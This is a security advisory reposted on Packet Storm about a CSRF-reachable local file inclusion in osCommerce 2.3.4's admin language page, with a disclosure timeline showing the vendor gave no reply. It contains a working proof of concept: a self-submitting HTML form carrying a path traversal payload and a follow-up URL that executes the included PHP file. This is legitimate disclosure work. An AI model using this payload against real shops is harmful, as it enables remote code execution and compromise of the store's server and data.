what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

osCommerce 2.3.4 Local File Inclusion / Cross Site Request Forgery

osCommerce 2.3.4 Local File Inclusion / Cross Site Request Forgery
Posted Feb 18, 2016
Authored by High-Tech Bridge SA | Site htbridge.com

osCommerce version 2.3.4 suffers from cross site request forgery and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, file inclusion, csrf
SHA-256 | 0590c4c85647c5c0a02e877aee9bff53f2ee293542d8d20f50cdb9048d52be0f

osCommerce 2.3.4 Local File Inclusion / Cross Site Request Forgery

Change Mirror Download
Advisory ID: HTB23284
Product: osCommerce
Vendor: osCommerce
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: February 17, 2016
Vulnerability Type: PHP File Inclusion [CWE-98]
Risk Level: Medium
CVSSv3 Base Score: 5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in popular e-commerce software osCommerce with 280,000 store owners (according to the vendor). The vulnerability can be exploited to execute arbitrary PHP code on the remote system, compromise the vulnerable web application, its database and even the web server and related environment.

Successful exploitation of the vulnerability requires attacker to access to administrative panel, however it can also be successfully exploited by remote non-authenticated attacker via CSRF vector to which the application is also vulnerable.

The vulnerability exists due to insufficient filtration of "directory" HTTP POST parameter paassed to "/admin/languages.php" PHP script. A remote attacker can use path traversal sequences (e.g. "../../") to include and execute arbitrary PHP file from local server file system.

A simple CSRF exploit below will update application database and insert "/tmp/file" value string into web application configuration:


<form action="http://[HOST]/admin/languages.php?action=insert" method="post" name="main">
<input type="hidden" name="name" value="vu">
<input type="hidden" name="code" value="vu">
<input type="hidden" name="image" value="icon.gif">
<input type="hidden" name="directory" value="../../../../../../../../../../../tmp/file">
<input type="hidden" name="sort_order" value="">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>


Then, in order to execute the PHP code from "/tmp/file" file, just open the following URL:
http://[host]/index.php?language=vu

-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2015-12-21 Vendor notified via emails, no reply.
2016-01-06 Vendor notified via emails and forum, no reply.
2016-01-13 Fix Requested via emails, no reply.
2016-01-19 Fix Requested via emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23284 - https://www.htbridge.com/advisory/HTB23284 - RCE via CSRF in osCommerce
[2] osCommerce - http://www.oscommerce.com/ - osCommerce Online Merchant is a complete self-hosted online store solution that contains both a catalog frontend and an administration tool backend which can be easily installed and configured through a web-based installation procedure.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close